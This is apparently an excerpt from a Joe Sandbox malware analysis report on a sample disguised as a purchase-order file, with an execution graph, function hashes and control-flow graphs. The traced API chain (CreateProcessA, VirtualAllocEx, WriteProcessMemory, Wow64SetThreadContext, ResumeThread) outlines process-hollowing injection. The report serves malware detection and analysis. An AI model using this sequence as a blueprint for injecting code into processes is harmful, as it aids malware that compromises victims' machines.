                                                                                                                                                                      execution_graph 37304 570e5e0 37305 570e622 37304->37305 37306 570e628 GetModuleHandleW 37304->37306 37305->37306 37307 570e655 37306->37307 37419 5707910 37420 570791b 37419->37420 37422 5707a48 37419->37422 37423 5707a6d 37422->37423 37427 5707f60 37423->37427 37431 5707f50 37423->37431 37429 5707f87 37427->37429 37428 5708064 37428->37428 37429->37428 37435 5707bac 37429->37435 37433 5707f60 37431->37433 37432 5708064 37432->37432 37433->37432 37434 5707bac CreateActCtxA 37433->37434 37434->37432 37436 5708ff0 CreateActCtxA 37435->37436 37438 57090b3 37436->37438 37120 b50d011 37121 b50cef4 37120->37121 37122 b50d0d9 37121->37122 37127 b50f490 37121->37127 37143 b50f4ba 37121->37143 37159 b50f4c8 37121->37159 37175 b50f526 37121->37175 37128 b50f49b 37127->37128 37129 b50f493 37127->37129 37128->37121 37129->37128 37192 f2601a4 37129->37192 37197 f26051b 37129->37197 37202 f26063b 37129->37202 37207 f26011c 37129->37207 37211 f2604d1 37129->37211 37216 f2602d0 37129->37216 37221 f260553 37129->37221 37226 f2605f3 37129->37226 37231 f260297 37129->37231 37236 f2606c8 37129->37236 37240 f2603cd 37129->37240 37245 f2601cc 37129->37245 37252 f260444 37129->37252 37144 b50f4c3 37143->37144 37145 f2601a4 2 API calls 37144->37145 37146 f260444 2 API calls 37144->37146 37147 b50f506 37144->37147 37148 f2601cc 4 API calls 37144->37148 37149 f2603cd 2 API calls 37144->37149 37150 f2606c8 2 API calls 37144->37150 37151 f260297 2 API calls 37144->37151 37152 f2605f3 2 API calls 37144->37152 37153 f260553 2 API calls 37144->37153 37154 f2602d0 2 API calls 37144->37154 37155 f2604d1 2 API calls 37144->37155 37156 f26011c 2 API calls 37144->37156 37157 f26063b 2 API calls 37144->37157 37158 f26051b 2 API calls 37144->37158 37145->37147 37146->37147 37147->37121 37148->37147 37149->37147 37150->37147 37151->37147 37152->37147 37153->37147 37154->37147 37155->37147 37156->37147 37157->37147 37158->37147 37160 b50f4de 37159->37160 37161 f2601a4 2 API calls 37160->37161 37162 f260444 2 API calls 37160->37162 37163 f2601cc 4 API calls 37160->37163 37164 f2603cd 2 API calls 37160->37164 37165 f2606c8 2 API calls 37160->37165 37166 f260297 2 API calls 37160->37166 37167 f2605f3 2 API calls 37160->37167 37168 f260553 2 API calls 37160->37168 37169 f2602d0 2 API calls 37160->37169 37170 f2604d1 2 API calls 37160->37170 37171 f26011c 2 API calls 37160->37171 37172 b50f506 37160->37172 37173 f26063b 2 API calls 37160->37173 37174 f26051b 2 API calls 37160->37174 37161->37172 37162->37172 37163->37172 37164->37172 37165->37172 37166->37172 37167->37172 37168->37172 37169->37172 37170->37172 37171->37172 37172->37121 37173->37172 37174->37172 37176 b50f529 37175->37176 37177 b50f4b4 37175->37177 37176->37121 37178 b50f506 37177->37178 37179 f2601a4 2 API calls 37177->37179 37180 f260444 2 API calls 37177->37180 37181 f2601cc 4 API calls 37177->37181 37182 f2603cd 2 API calls 37177->37182 37183 f2606c8 2 API calls 37177->37183 37184 f260297 2 API calls 37177->37184 37185 f2605f3 2 API calls 37177->37185 37186 f260553 2 API calls 37177->37186 37187 f2602d0 2 API calls 37177->37187 37188 f2604d1 2 API calls 37177->37188 37189 f26011c 2 API calls 37177->37189 37190 f26063b 2 API calls 37177->37190 37191 f26051b 2 API calls 37177->37191 37178->37121 37179->37178 37180->37178 37181->37178 37182->37178 37183->37178 37184->37178 37185->37178 37186->37178 37187->37178 37188->37178 37189->37178 37190->37178 37191->37178 37193 f2601ad 37192->37193 37194 f2605b0 37193->37194 37256 b50c6b0 37193->37256 37260 b50c6b8 37193->37260 37194->37128 37198 f260521 37197->37198 37264 b50c600 37198->37264 37268 b50c608 37198->37268 37199 f26074a 37203 f260648 37202->37203 37205 b50c600 ResumeThread 37203->37205 37206 b50c608 ResumeThread 37203->37206 37204 f26074a 37204->37204 37205->37204 37206->37204 37272 b50cad8 37207->37272 37276 b50cacd 37207->37276 37212 f2603eb 37211->37212 37213 f26040c 37212->37213 37280 b50c850 37212->37280 37284 b50c848 37212->37284 37217 f2602d6 37216->37217 37218 f260190 37217->37218 37288 b50c940 37217->37288 37292 b50c939 37217->37292 37218->37128 37222 f260532 37221->37222 37224 b50c600 ResumeThread 37222->37224 37225 b50c608 ResumeThread 37222->37225 37223 f26074a 37224->37223 37225->37223 37227 f2605f9 37226->37227 37229 b50c940 ReadProcessMemory 37227->37229 37230 b50c939 ReadProcessMemory 37227->37230 37228 f260190 37228->37128 37229->37228 37230->37228 37232 f2609ae 37231->37232 37296 b50c790 37232->37296 37300 b50c788 37232->37300 37233 f2609cc 37238 b50c6b0 Wow64SetThreadContext 37236->37238 37239 b50c6b8 Wow64SetThreadContext 37236->37239 37237 f2606ec 37238->37237 37239->37237 37241 f2603d3 37240->37241 37243 b50c850 WriteProcessMemory 37241->37243 37244 b50c848 WriteProcessMemory 37241->37244 37242 f26040c 37243->37242 37244->37242 37250 b50c850 WriteProcessMemory 37245->37250 37251 b50c848 WriteProcessMemory 37245->37251 37246 f2601f0 37247 f2606ec 37246->37247 37248 b50c6b0 Wow64SetThreadContext 37246->37248 37249 b50c6b8 Wow64SetThreadContext 37246->37249 37247->37128 37248->37247 37249->37247 37250->37246 37251->37246 37254 b50c850 WriteProcessMemory 37252->37254 37255 b50c848 WriteProcessMemory 37252->37255 37253 f26047f 37253->37128 37254->37253 37255->37253 37257 b50c6b8 Wow64SetThreadContext 37256->37257 37259 b50c745 37257->37259 37259->37194 37261 b50c6fd Wow64SetThreadContext 37260->37261 37263 b50c745 37261->37263 37263->37194 37265 b50c608 ResumeThread 37264->37265 37267 b50c679 37265->37267 37267->37199 37269 b50c648 ResumeThread 37268->37269 37271 b50c679 37269->37271 37271->37199 37273 b50cb61 CreateProcessA 37272->37273 37275 b50cd23 37273->37275 37275->37275 37277 b50cad8 CreateProcessA 37276->37277 37279 b50cd23 37277->37279 37279->37279 37281 b50c898 WriteProcessMemory 37280->37281 37283 b50c8ef 37281->37283 37283->37213 37285 b50c898 WriteProcessMemory 37284->37285 37287 b50c8ef 37285->37287 37287->37213 37289 b50c98b ReadProcessMemory 37288->37289 37291 b50c9cf 37289->37291 37291->37218 37293 b50c940 ReadProcessMemory 37292->37293 37295 b50c9cf 37293->37295 37295->37218 37297 b50c7d0 VirtualAllocEx 37296->37297 37299 b50c80d 37297->37299 37299->37233 37301 b50c7d0 VirtualAllocEx 37300->37301 37303 b50c80d 37301->37303 37303->37233 37439 b50d0b3 37440 b50cef4 37439->37440 37441 b50d0d9 37440->37441 37442 b50f490 12 API calls 37440->37442 37443 b50f526 12 API calls 37440->37443 37444 b50f4c8 12 API calls 37440->37444 37445 b50f4ba 12 API calls 37440->37445 37442->37440 37443->37440 37444->37440 37445->37440 37308 f260eb0 37309 f26103b 37308->37309 37310 f260ed6 37308->37310 37310->37309 37313 f26112a 37310->37313 37316 f261130 PostMessageW 37310->37316 37314 f261130 PostMessageW 37313->37314 37315 f26119c 37314->37315 37315->37310 37317 f26119c 37316->37317 37317->37310 37318 9ab6a70 37322 9ab6aa8 37318->37322 37326 9ab6a98 37318->37326 37319 9ab6a8f 37323 9ab6ab1 37322->37323 37330 9ab6aee 37323->37330 37324 9ab6ad6 37324->37319 37327 9ab6ab1 37326->37327 37329 9ab6aee DrawTextExW 37327->37329 37328 9ab6ad6 37328->37319 37329->37328 37331 9ab6b1a 37330->37331 37332 9ab6b2b 37330->37332 37331->37324 37333 9ab6bb9 37332->37333 37336 9ab7220 37332->37336 37341 9ab7214 37332->37341 37333->37324 37337 9ab7248 37336->37337 37338 9ab734e 37337->37338 37346 9ab7928 37337->37346 37351 9ab7938 37337->37351 37338->37331 37342 9ab7220 37341->37342 37343 9ab734e 37342->37343 37344 9ab7928 DrawTextExW 37342->37344 37345 9ab7938 DrawTextExW 37342->37345 37343->37331 37344->37343 37345->37343 37347 9ab7938 37346->37347 37356 9ab7d49 37347->37356 37361 9ab7d58 37347->37361 37348 9ab79c4 37348->37338 37352 9ab794e 37351->37352 37354 9ab7d49 DrawTextExW 37352->37354 37355 9ab7d58 DrawTextExW 37352->37355 37353 9ab79c4 37353->37338 37354->37353 37355->37353 37357 9ab7d58 37356->37357 37365 9ab7d98 37357->37365 37372 9ab7d89 37357->37372 37358 9ab7d76 37358->37348 37363 9ab7d89 DrawTextExW 37361->37363 37364 9ab7d98 DrawTextExW 37361->37364 37362 9ab7d76 37362->37348 37363->37362 37364->37362 37366 9ab7dc9 37365->37366 37367 9ab7df6 37366->37367 37379 9ab7e09 37366->37379 37385 9ab7ec0 37366->37385 37390 9ab7f1c 37366->37390 37396 9ab7e18 37366->37396 37367->37358 37373 9ab7d98 37372->37373 37374 9ab7df6 37373->37374 37375 9ab7e09 DrawTextExW 37373->37375 37376 9ab7e18 DrawTextExW 37373->37376 37377 9ab7f1c DrawTextExW 37373->37377 37378 9ab7ec0 DrawTextExW 37373->37378 37374->37358 37375->37374 37376->37374 37377->37374 37378->37374 37380 9ab7e39 37379->37380 37381 9ab7e4e 37380->37381 37383 9ab7ec0 DrawTextExW 37380->37383 37384 9ab7ee3 37380->37384 37402 9ab70e8 37380->37402 37381->37367 37383->37380 37384->37367 37386 9ab7e6c 37385->37386 37387 9ab7ee3 37386->37387 37388 9ab7ec0 DrawTextExW 37386->37388 37389 9ab70e8 DrawTextExW 37386->37389 37387->37367 37388->37385 37389->37386 37391 9ab7f2a 37390->37391 37392 9ab7e6c 37390->37392 37393 9ab7ee3 37392->37393 37394 9ab7ec0 DrawTextExW 37392->37394 37395 9ab70e8 DrawTextExW 37392->37395 37393->37367 37394->37392 37395->37392 37398 9ab7e39 37396->37398 37397 9ab7e4e 37397->37367 37398->37397 37399 9ab70e8 DrawTextExW 37398->37399 37400 9ab7ec0 DrawTextExW 37398->37400 37401 9ab7ee3 37398->37401 37399->37398 37400->37398 37401->37367 37404 9ab70f3 37402->37404 37403 9ab9e89 37403->37380 37404->37403 37408 9aba9ef 37404->37408 37412 9abaa00 37404->37412 37405 9ab9f9c 37405->37380 37409 9abaa00 37408->37409 37415 9ab9a34 37409->37415 37413 9ab9a34 DrawTextExW 37412->37413 37414 9abaa1d 37413->37414 37414->37405 37416 9abaa38 DrawTextExW 37415->37416 37418 9abaa1d 37416->37418 37418->37405

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 09AB0040 Relevance: 7.7, Strings: 4, Instructions: 2671COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1461531912.0000000009AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9ab0000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (oq$4'q$4'q$4'q
                                                                                                                                                                      • API String ID: 0-2528434116
                                                                                                                                                                      • Opcode ID: bdb07bde36dc7bd1a790b1401d30081d436fd336f3dd6935a5628d39ae7343e8
                                                                                                                                                                      • Instruction ID: 58b6c53163dda29e4cbc2d56a4aa2766944f1de04d73e5863dc2552cbd3f5920
                                                                                                                                                                      • Opcode Fuzzy Hash: bdb07bde36dc7bd1a790b1401d30081d436fd336f3dd6935a5628d39ae7343e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 44530A74A01219CFDB64CF28C898B9DB7B6BF89710F158599E819AB365CB30ED81CF50
                                                                                                                                                                      Function 05700E3E Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1369 5700e3e-5700e4b 1370 5700e92 1369->1370 1371 5700e4d-5700e4f 1369->1371 1372 5700e94-5700e95 1370->1372 1373 5700e99-5700e9a 1370->1373 1374 5700e5a-5700e61 1371->1374 1372->1373 1375 5700ea1-5700ea6 1373->1375 1376 5700e9c 1373->1376 1377 5700ea8-5700eaa 1375->1377 1378 5700ead-5700eb0 1375->1378 1376->1375 1379 5700eb1-5700eb2 1377->1379 1380 5700eac 1377->1380 1378->1379 1381 5700eb4-5700eb6 1379->1381 1382 5700eb9 1379->1382 1380->1378 1383 5700eb8 1381->1383 1384 5700ebd-5700ebe 1381->1384 1382->1384 1383->1382 1385 5700ec0-5700ec2 1384->1385 1386 5700ec5-5700ec6 1384->1386 1392 5700ec9-5700eca 1385->1392 1396 5700ec4 1385->1396 1387 5700ec8 1386->1387 1388 5700ecd-5700ece 1386->1388 1390 5700ed5-5700eda 1387->1390 1387->1392 1389 5700ed0 1388->1389 1388->1390 1393 5700ed1-5700ed3 1389->1393 1394 5700ee1-5700eea 1390->1394 1395 5700edc 1390->1395 1392->1393 1397 5700ecc 1392->1397 1393->1390 1398 5700ef1-5700f3b call 57000e4 1394->1398 1399 5700eec-5700ef0 1394->1399 1395->1394 1396->1386 1397->1388 1403 5700f40 1398->1403 1399->1398 1404 5700f45-5700f5a 1403->1404 1405 5700f60 1404->1405 1406 5701057-570109b call 57000f4 1404->1406 1405->1403 1405->1406 1407 5701040-5701044 1405->1407 1408 5700fc4-5700fd6 1405->1408 1409 5700fb7-5700fc2 1405->1409 1410 5700f67-5700f95 1405->1410 1411 5700f97-5700fb5 1405->1411 1412 5701019-5701025 1405->1412 1413 5700fdb-5701014 1405->1413 1430 570109d call 5701ca0 1406->1430 1431 570109d call 5701e03 1406->1431 1432 570109d call 5701a03 1406->1432 1433 570109d call 570212b 1406->1433 1434 570109d call 5701e4f 1406->1434 1414 5701046-570104b 1407->1414 1415 570104d 1407->1415 1408->1404 1409->1404 1410->1404 1411->1404 1423 570102d-570103b 1412->1423 1413->1404 1419 5701052 1414->1419 1415->1419 1419->1404 1423->1404 1429 57010a3-57010ac 1430->1429 1431->1429 1432->1429 1433->1429 1434->1429
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Teq$Teq
                                                                                                                                                                      • API String ID: 0-2938103587
                                                                                                                                                                      • Opcode ID: e948bb1721190efd243292d1931245f174659d88c333a7bfe57007ca47cbfab5
                                                                                                                                                                      • Instruction ID: f41028c148ddc222cb201b7159bb66eb69fc427ed3c46f05ce997ce8cb9190c9
                                                                                                                                                                      • Opcode Fuzzy Hash: e948bb1721190efd243292d1931245f174659d88c333a7bfe57007ca47cbfab5
                                                                                                                                                                      • Instruction Fuzzy Hash: F3616975B04214CFDB04DB74C849B6FBBF2EB86320F5590AAD405FB2A2C6709801EB51
                                                                                                                                                                      Function 05701A03 Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4*}
                                                                                                                                                                      • API String ID: 0-1306871344
                                                                                                                                                                      • Opcode ID: e42c467f5109602b1b7e2910e2805c13b0bad51ff84f875793da56931f2b776d
                                                                                                                                                                      • Instruction ID: 112656a7a63f956f302c844a2e9d6d2e8408846a0ac7fcc29e89cd90ddf5d1f0
                                                                                                                                                                      • Opcode Fuzzy Hash: e42c467f5109602b1b7e2910e2805c13b0bad51ff84f875793da56931f2b776d
                                                                                                                                                                      • Instruction Fuzzy Hash: A7E1267B918215DFC705CFA4C888E59BBF2FB99700B97A4A6D001AF2A3C731D911EB45
                                                                                                                                                                      Function 057021DB Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4*}
                                                                                                                                                                      • API String ID: 0-1306871344
                                                                                                                                                                      • Opcode ID: af28f80e679be6cc810e977e5e933c9280c8702232b03df8c3fe67e6904f64b0
                                                                                                                                                                      • Instruction ID: 0a6c5478035156ccb858a26c815e0018302380f783dc2e9c1e4cd3bdd3678771
                                                                                                                                                                      • Opcode Fuzzy Hash: af28f80e679be6cc810e977e5e933c9280c8702232b03df8c3fe67e6904f64b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 29A1E13B508111DFC715CFA4D888D65BBF6BB59300793A5A2D501AF2E3C730E961EB89
                                                                                                                                                                      Function 0F261F70 Relevance: .6, Instructions: 622COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8cb65df41491cf14cc2fb26f5f2ff154cfb95816abae33cb62441453fb77689f
                                                                                                                                                                      • Instruction ID: 19b1d6386a1c1a19090ef599c13759731468f0e6faf68c0f9a0a1fc9dadd1e2e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cb65df41491cf14cc2fb26f5f2ff154cfb95816abae33cb62441453fb77689f
                                                                                                                                                                      • Instruction Fuzzy Hash: FD329970B11205CFDB28DBA9C594BAEB7F6AF89700F244469E506DB3E2CB34E941CB51
                                                                                                                                                                      Function 0B5028D8 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d3b8af0d159840ee47216a98606a22774dc830c5a10391b175cb97bbc1809054
                                                                                                                                                                      • Instruction ID: 1ced0f6c1700887ca05df86c164c26aeb3939c8b9b0f954ad876f1cee180c83e
                                                                                                                                                                      • Opcode Fuzzy Hash: d3b8af0d159840ee47216a98606a22774dc830c5a10391b175cb97bbc1809054
                                                                                                                                                                      • Instruction Fuzzy Hash: F7B1D174D1421DCFEB24CFA9C8487AEBBF6BF89300F1084AAD519A7291DB754A85CF40
                                                                                                                                                                      Function 0B5028E8 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7aee964b9866ea698c1ba28f1b40e7577e17e761a7f1b591024f4319d882516f
                                                                                                                                                                      • Instruction ID: 69a05c3aa9138fcfb23860d60e9c28c312c2bdc1067746a29193b6df274f5840
                                                                                                                                                                      • Opcode Fuzzy Hash: 7aee964b9866ea698c1ba28f1b40e7577e17e761a7f1b591024f4319d882516f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5DA1E274D1422CCFEB14CFA9C8487EEBBF6BB89300F1094A9D519A7291DB754985CF40
                                                                                                                                                                      Function 0F260283 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 437e0ef137ce93116e783544097fd354c62de72b50dba34d0101aab97daac1da
                                                                                                                                                                      • Instruction ID: 585d5cb8fbd8eeab5dc9c398d835fffd3fd20728e10172258ca8009b4d5b382a
                                                                                                                                                                      • Opcode Fuzzy Hash: 437e0ef137ce93116e783544097fd354c62de72b50dba34d0101aab97daac1da
                                                                                                                                                                      • Instruction Fuzzy Hash: F4C01222D7D049D7CB008EB4A4180F8FB3CDA8F16EB0572E1814F560139AA082AAEB48
                                                                                                                                                                      Function 0B50CACD Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1618 b50cacd-b50cb6d 1621 b50cba6-b50cbc6 1618->1621 1622 b50cb6f-b50cb79 1618->1622 1627 b50cbc8-b50cbd2 1621->1627 1628 b50cbff-b50cc2e 1621->1628 1622->1621 1623 b50cb7b-b50cb7d 1622->1623 1625 b50cba0-b50cba3 1623->1625 1626 b50cb7f-b50cb89 1623->1626 1625->1621 1629 b50cb8b 1626->1629 1630 b50cb8d-b50cb9c 1626->1630 1627->1628 1631 b50cbd4-b50cbd6 1627->1631 1638 b50cc30-b50cc3a 1628->1638 1639 b50cc67-b50cd21 CreateProcessA 1628->1639 1629->1630 1630->1630 1632 b50cb9e 1630->1632 1633 b50cbd8-b50cbe2 1631->1633 1634 b50cbf9-b50cbfc 1631->1634 1632->1625 1636 b50cbe4 1633->1636 1637 b50cbe6-b50cbf5 1633->1637 1634->1628 1636->1637 1637->1637 1640 b50cbf7 1637->1640 1638->1639 1641 b50cc3c-b50cc3e 1638->1641 1650 b50cd23-b50cd29 1639->1650 1651 b50cd2a-b50cdb0 1639->1651 1640->1634 1642 b50cc40-b50cc4a 1641->1642 1643 b50cc61-b50cc64 1641->1643 1645 b50cc4c 1642->1645 1646 b50cc4e-b50cc5d 1642->1646 1643->1639 1645->1646 1646->1646 1647 b50cc5f 1646->1647 1647->1643 1650->1651 1661 b50cdc0-b50cdc4 1651->1661 1662 b50cdb2-b50cdb6 1651->1662 1664 b50cdd4-b50cdd8 1661->1664 1665 b50cdc6-b50cdca 1661->1665 1662->1661 1663 b50cdb8 1662->1663 1663->1661 1667 b50cde8-b50cdec 1664->1667 1668 b50cdda-b50cdde 1664->1668 1665->1664 1666 b50cdcc 1665->1666 1666->1664 1670 b50cdfe-b50ce05 1667->1670 1671 b50cdee-b50cdf4 1667->1671 1668->1667 1669 b50cde0 1668->1669 1669->1667 1672 b50ce07-b50ce16 1670->1672 1673 b50ce1c 1670->1673 1671->1670 1672->1673 1675 b50ce1d 1673->1675 1675->1675
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0B50CD0E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 1ea945fea565ded9d2fcc95806759daca98d49bc52c7e0eb38c35d2db47b5401
                                                                                                                                                                      • Instruction ID: 088a3147a28e8fc64c6ddbc562bcda3dd8f0a29d5253f660c04c40d103388f6f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea945fea565ded9d2fcc95806759daca98d49bc52c7e0eb38c35d2db47b5401
                                                                                                                                                                      • Instruction Fuzzy Hash: 71A15C71D107599FEB24DFA8C841BDDBBB2FF49310F1482A9E818A7280DB749985CF91
                                                                                                                                                                      Function 0B50CAD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1676 b50cad8-b50cb6d 1678 b50cba6-b50cbc6 1676->1678 1679 b50cb6f-b50cb79 1676->1679 1684 b50cbc8-b50cbd2 1678->1684 1685 b50cbff-b50cc2e 1678->1685 1679->1678 1680 b50cb7b-b50cb7d 1679->1680 1682 b50cba0-b50cba3 1680->1682 1683 b50cb7f-b50cb89 1680->1683 1682->1678 1686 b50cb8b 1683->1686 1687 b50cb8d-b50cb9c 1683->1687 1684->1685 1688 b50cbd4-b50cbd6 1684->1688 1695 b50cc30-b50cc3a 1685->1695 1696 b50cc67-b50cd21 CreateProcessA 1685->1696 1686->1687 1687->1687 1689 b50cb9e 1687->1689 1690 b50cbd8-b50cbe2 1688->1690 1691 b50cbf9-b50cbfc 1688->1691 1689->1682 1693 b50cbe4 1690->1693 1694 b50cbe6-b50cbf5 1690->1694 1691->1685 1693->1694 1694->1694 1697 b50cbf7 1694->1697 1695->1696 1698 b50cc3c-b50cc3e 1695->1698 1707 b50cd23-b50cd29 1696->1707 1708 b50cd2a-b50cdb0 1696->1708 1697->1691 1699 b50cc40-b50cc4a 1698->1699 1700 b50cc61-b50cc64 1698->1700 1702 b50cc4c 1699->1702 1703 b50cc4e-b50cc5d 1699->1703 1700->1696 1702->1703 1703->1703 1704 b50cc5f 1703->1704 1704->1700 1707->1708 1718 b50cdc0-b50cdc4 1708->1718 1719 b50cdb2-b50cdb6 1708->1719 1721 b50cdd4-b50cdd8 1718->1721 1722 b50cdc6-b50cdca 1718->1722 1719->1718 1720 b50cdb8 1719->1720 1720->1718 1724 b50cde8-b50cdec 1721->1724 1725 b50cdda-b50cdde 1721->1725 1722->1721 1723 b50cdcc 1722->1723 1723->1721 1727 b50cdfe-b50ce05 1724->1727 1728 b50cdee-b50cdf4 1724->1728 1725->1724 1726 b50cde0 1725->1726 1726->1724 1729 b50ce07-b50ce16 1727->1729 1730 b50ce1c 1727->1730 1728->1727 1729->1730 1732 b50ce1d 1730->1732 1732->1732
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0B50CD0E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: a0d9fdd11e0c5e96c197f81ba750b65b67b31543c898fae5f7ea7c2f9b14ba87
                                                                                                                                                                      • Instruction ID: dcd34ee197cb696d99b24fb1cd913b403a9d8948aedec83042dad2c33d425e70
                                                                                                                                                                      • Opcode Fuzzy Hash: a0d9fdd11e0c5e96c197f81ba750b65b67b31543c898fae5f7ea7c2f9b14ba87
                                                                                                                                                                      • Instruction Fuzzy Hash: 84914C71D106599FEB24DFA8C841BDDBBB2FF49310F1482A9E818A7280DB749985CF91
                                                                                                                                                                      Function 05708FE4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1908 5708fe4-57090b1 CreateActCtxA 1910 57090b3-57090b9 1908->1910 1911 57090ba-5709114 1908->1911 1910->1911 1918 5709123-5709127 1911->1918 1919 5709116-5709119 1911->1919 1920 5709138 1918->1920 1921 5709129-5709135 1918->1921 1919->1918 1923 5709139 1920->1923 1921->1920 1923->1923
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 057090A1
